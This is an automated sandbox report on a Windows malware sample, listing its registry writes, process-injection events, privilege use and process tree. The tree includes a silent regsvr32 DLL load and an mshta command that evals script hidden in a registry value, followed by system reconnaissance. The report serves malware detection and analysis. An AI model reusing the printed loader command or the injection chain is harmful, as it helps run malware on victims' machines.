Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000929baea5fcabd80198ab3da6fcabd80198ab3da6fcabd801f90407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000323236393033306539653632383732333338313234633561313335333033303362343861386632646533623861346564396431616431363230333033393162650000b20009000400efbe0955e0730955e0732e000000000000000000000000000000000000000000000000008f3d2300320032003600390030003300300065003900650036003200380037003200330033003800310032003400630035006100310033003500330030003300300033006200340038006100380066003200640065003300620038006100340065006400390064003100610064003100360032003000330030003300390031006200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32323639303330653965363238373233333831323463356131333533303330336234386138663264653362386134656439643161643136323033303339316265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9185462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ffece5954ed7a6bf283d28ce3cccf569e240c3907c13f708593aa3c6bc89ccab" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = 5c1352a5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = bf2224a5fcabd801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c89f2bd41aee2ec830a66132c5645606c291cf54f900f2c9b92cc3650442eca" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000088abffa5fcabd801bc8055a6fcabd801bc8055a6fcabd801dd8d18000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346165346334336438616662356563393064353330373933363261636230303430356330353964326430303662323931653935343335623635393236313434330000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d6660b00340061006500340063003400330064003800610066006200350065006300390030006400350033003000370039003300360032006100630062003000300034003000350063003000350039006400320064003000300036006200320039003100650039003500340033003500620036003500390032003600310034003400330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34616534633433643861666235656339306435333037393336326163623030343035633035396432643030366232393165393534333562363539323631343433000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d7eecab9-6c40-413e-95 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9cea0c2-7e1f-4d89-a5 C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1184 wrote to memory of 1716 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1184 wrote to memory of 1716 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1184 wrote to memory of 1716 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 376 wrote to memory of 1520 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 1520 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1520 wrote to memory of 2812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1520 wrote to memory of 2812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2812 wrote to memory of 3684 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2812 wrote to memory of 3684 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1520 wrote to memory of 3736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1520 wrote to memory of 3736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3736 wrote to memory of 4164 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3736 wrote to memory of 4164 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1520 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1520 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1520 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1520 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1028 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 1028 wrote to memory of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 1028 wrote to memory of 4196 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 4196 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4196 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4196 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4196 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1028 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 2348 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 2348 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2348 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1028 wrote to memory of 1308 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 1308 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 1448 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

